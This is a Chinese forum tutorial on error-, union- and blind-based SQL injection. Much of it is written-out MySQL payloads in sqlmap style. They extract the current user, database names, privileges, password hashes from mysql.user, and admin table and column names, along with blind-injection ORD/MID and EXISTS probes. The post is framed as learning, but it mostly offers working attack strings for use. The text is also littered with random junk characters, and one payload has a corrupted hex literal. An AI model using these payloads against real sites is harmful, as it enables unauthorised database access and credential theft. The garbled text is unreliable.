放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。. A. m6 o6 y# ?* {/ G/ H5 J) M
- T- C' ^& R! s3 z) J9 y这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表. Y# ?8 Z' I8 q2 t
2 j8 e8 \& F7 D
分类标准 分类 备注( c I* i: ]" _, q- _
按字段类型 整型注入,字符型注入
9 c+ W1 [9 Q) b$ a4 m# ^% x按出现的位置 get注入,post注入,cookie注入,http header注入 0 w( f# ]* f3 K2 g4 Q
然而高级注入是这样的
5 s$ y0 \8 p9 n5 }8 b
l& h! f3 Y' s% ^& }高级注入分类 条件3 O$ B. S4 {' A2 d
error-based sql 数据库的错误回显可以返回,存在数据库,表结构5 o/ r7 A/ [2 y6 n: a
union-based sql 能够使用union,存在数据库,表结构
* F, s# v$ p, i0 {# j/ y/ o- \) G6 dblind sql 存在注入& N" i6 }) c9 v1 k; _& I
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。6 s# \$ X) F5 w+ F( Y+ b) S4 v
* z3 ~- Z8 `/ M A# o. d
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
$ F- C- `' y: ^! i" X% Y5 B
% X6 F1 b! ] @7 o附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。- {' `0 J$ I: E/ L* @5 n9 [! p
, F4 ?" q$ }/ ]3 l; E" p
这里用mysql说明
$ b5 u# L" P% A# x. R' ?/ n# h! w " n, @# w6 j% I3 I2 G7 w3 {
e注入坛子里很多了,请看戳我或者再戳我: H4 W+ K4 V$ {+ b, m' P
% X3 v. V3 n( p
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
. y2 o) y; H9 o: d. o: j7 T
) b. ^0 W8 R* Q) L) ^6 b" e获取当前数据库用户名9 x$ k( ?8 V. V3 _
* W& T3 @0 n4 \- N# V: _. {UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
8 v3 G9 l6 Q6 R; lAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL2 W o) [/ X: v! V/ V9 X$ b/ c
L, NULL#" }' K r$ z8 S8 C9 T
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。+ _! n1 G$ ~; ]* C' y( y& W3 y
) T9 E6 ?' L1 M: B6 k
获取数据库名9 a6 }* X3 v$ ^# O/ B2 d/ u
9 D; m" {3 J* b. T- x4 F" l) ]- H
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#' U7 r9 Y2 z i& ]. w' t
获取所有用户名( p! X8 a$ X% j* d7 q
( Z! r& r7 b8 R% P8 }7 o9 y
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES# F4 N$ t. d& I! N' m
查看当前用户权限
. B. |) d* i6 H1 d# s" a* k: _7 ^* z " _+ D* }, d! e* I
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
+ u/ y/ M1 a: k7 b尝试获取密码,当然需要有能读mysql数据库的权限
4 \8 C4 ^5 x/ u6 ^7 v0 R b# O+ g 0 l) q' o% U& a+ u
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#& ?/ t0 O( C. T0 o! }" a! I: N8 F
获取表名,limit什么的自己搞啦
# i G% X' a; K 6 }' j9 q+ ]2 j i3 O& F
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
) Q A1 T7 S% {& s获取字段名及其类型
6 J8 x0 M2 R2 g" F1 [/ I" m& HUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
% s* ~6 H2 h" t; ~+ O: Q/ D# M
7 ?6 {' z. u: M( P+ qb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。9 P* N* z+ v6 ~- c* K
9 p' G& ^1 V) J# \2 }& l
如:* [$ ~( ]; S1 j6 _; D* M: f- E
获取当前用户名: v: B- B3 t) l: ^. ^9 l
9 u) Y; K; V0 _AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
5 d$ b" E2 g1 V. n/ |, O% P获取当前数据库6 `9 d4 ?: e) l! l, c# U
K/ x' X t7 r0 P0 h, m7 G
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106* A& J' m! y0 k( w
获取表名" H$ V& W: B0 D* Q- r8 _- u
0 b& Y5 r, S; @4 zAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 514 m! o! T6 T; m. [3 T& ?% n0 S
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
( l/ a9 E6 ~- Z8 x回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。" H1 }, ~8 N! i
爆表
- ~8 h1 _$ |, Z3 Y2 Q2 w
9 e% b5 s$ X$ i0 h$ hAND EXISTS(select * from table)
5 o! \, e+ N# Y# ?) V爆字段
9 p6 S# N- \/ T7 |1 x , L$ F! f5 L2 ? T/ M6 L( ]
AND EXISTS(select pwd from table)& K6 [/ M0 o" Z
盲注的变化就比较多了,由于篇幅,只是举个例子而已。& X$ B0 n5 H- T2 k q( s8 M
1 G, y% z/ W. f9 D$ j( {本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
/ A9 |) @0 L' A6 ]. a' l- W% ? |